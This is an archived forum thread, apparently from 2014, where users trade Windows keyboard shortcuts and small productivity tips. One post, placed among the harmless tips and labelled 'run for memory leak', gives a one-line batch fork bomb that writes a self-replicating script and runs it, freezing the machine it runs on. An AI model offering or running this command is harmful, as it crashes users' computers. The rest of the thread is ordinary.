Author Topic: Uncommon Windows Tricks  (Read 2168 times)

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Offline peskybear

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Uncommon Windows Tricks
« on: July 12, 2014, 01:25:30 am »
From the totse2 archives with various listed contributors:

-- Ghost Prototype --
Windows key + arrow keys move the active window to different screens, and if you have 7, different sections of the screens as well.

Windows key + D is minimize erry'thang.

You know about hitting tab to move between fields, control tab to switch tabs in a browser, and alt tab to switch between windows and programs, right? Well you can also throw shift into any of those key combinations and they will do the same thing, backwards.

-- Hazza32 --
Windows key + r = run useful for access to shit.

-- Ghost Prototype --
^ I don't know if it's only for cmd.exe, but instead of hitting enter, press control - shift - enter. It'll run it as administrator.

-- easy-e --
Holding Ctrl when using the arrow keys goes to the next available whitespace instead of only one character. It also works with backspace and delete. If you hit CTRL backspace it deletes a whole word instead of one character.

In Microsoft Excel if you select one row and hit CTRL + D it will fill down from the previous row. If you select multiple rows it will take whatever is in the top row and fill it down into the rest of the cells.

CTRL + HOME or END jumps to the beginning or end of the document instead of the beginning or end of the line.

-- Arnox --
I remember that you can leave the file of a name blank by hitting Alt + 255 while editing the name but last I tried it didn't work for me. Maybe they took it out in an update.

EDIT: Nevermind, you need to use the the keypad with Number Lock on to type in the 255 with Alt held down.

-- Kuhn --
Alt + F4 [closes current window]

-- SLP --
When you are writing and want to give a range of values, using a hyphen is incorrect. You should use an en dash and on Windows this is written by holding down Alt and typing 0150.
Similarly when you place a break of thought in a sentence, using a hyphen is incorrect. You should use an em dash and on Windows this is written by holding down Alt and typing 0151.
Hyphen -
En dash –
Em dash —

-- Ghost Prototype --
When in "Safe Mode", Windows will generally put you in a tiny resolution, and it bunches everything up on the screen. Attempting to change the resolution the normal way doesn't always work, however, your computer can still do it. In your normal display properties, click on 'advanced'. Under the 'Adapter' tab, click on 'list all modes'. From there, you can select any resolution and color depth that your monitor can handle. It makes working in Safe Mode MUCH easier.

-- ShizzleShazzle--
There is an operating system that can be booted to live from a CD called Mini-XP. It is great for data recovery and shit like that if you wan't a familiar GUI and the ability to run Windows executables. It is included on Hiren's BootCD which has a lot of other good tools as well.

-- distortedvoice--
windows - p changes extended monitor settings.

-- maxxnyc--
Win key + L = logout

-- burroughs--
As I quickly learned from my new job.. shift + arrow keys is a quicker way to select text when editing something. Shoulda prolly known that already.

-- easy-e --
Quote from: maxxnyc
Win key + L = logout
It is actually switch user or to lock the computer. I use it all the time so no-one can hop on my computer when I walk away.

Quote from: burroughs
As I quickly learned from my new job.. shift + arrow keys is a quicker way to select text when editing something. Shoulda prolly known that already.
If you hold shift and control and the use the arrow keys it jumps whole words. If you are just using the arrow keys you can hold the control key down and it will go whole words instead of 1 character at a time. I posted about this trick earlier but I mostly user CTRL + backspace because it deletes a whole word instead of just one character.

Another think I use all the time is the /k modifier when using Start->Run. If you type "ipconfig" it will run and then close. If you type "cmd /k ipconfig" it will run and keep the window open. It works for ping and anything else that would close immediately after running.

The trick I use by far the most is Alt + left or right arrow keys to navigate pages. It works just like the back and forward buttons in your browser. It also works in windows explorer or any internet browser. I find it very useful when going back and forth between folders on the computer or just when browsing the internet. It's especially faster if you have multiple monitors or a laptop because you don't have to move the cursor to navigate forwards/backwards.

-- White --
Ctrl + the mouse wheel, zooms in and out. Very handy for photo shopping or getting a closer look at pictures on the internet.

-- auschwitz nazi disneyland --
run for memory leak
Code: [Select]
cmd /c echo ^%0^|^%0>>x.bat&&x.bat
-- Duiasto --
Ctrl + c = copy,
ctrl + x = cut,
ctrl + v = paste

-- Rosbashi --
I literally JUST accidentally figured this one out: shift + mouse wheel up / down (previous/forward when browsing web pages)

and my own:
selecting a file and pressing F2 is the command for renaming a file so you don't have to right-click or double click the file slowly on its filename

Offline Rook

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Re: Uncommon Windows Tricks
« Reply #1 on: October 16, 2014, 09:23:06 am »
Funny how these shortcuts are much more organized and easy to figure out than most places I've had to constantly google in the past.. Definitely bookmarked this one.
The woods are lovely, dark and deep. But I have promises to keep, and miles to go before I sleep.
-Robert Frost

Offline -SpectraL

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Re: Uncommon Windows Tricks
« Reply #2 on: October 16, 2014, 09:39:44 am »

CTRL + +/- shrinks and expands the current screen size

Offline RustyShackleford

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Re: Uncommon Windows Tricks
« Reply #3 on: November 15, 2014, 01:40:41 pm »
ctrl + alt + arrow
To change screen orientation. (Since windows hasn't gotten into the multi desktop game).

ctrl + tab, ctrl + shift + tab
Cycles through tabs in firefox forward / backward (though I never actually use this).

ctrl + w
Kills the open tab of firefox

shift + side arrows, shift + ctrl + side arrows
Select editable text using only the keyboard

The last 3 aren't really windows specific but are software standards.

Offline -SpectraL

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Re: Uncommon Windows Tricks
« Reply #4 on: November 15, 2014, 03:08:36 pm »

ALT+F4 = kills browser (and any other program which has the focus)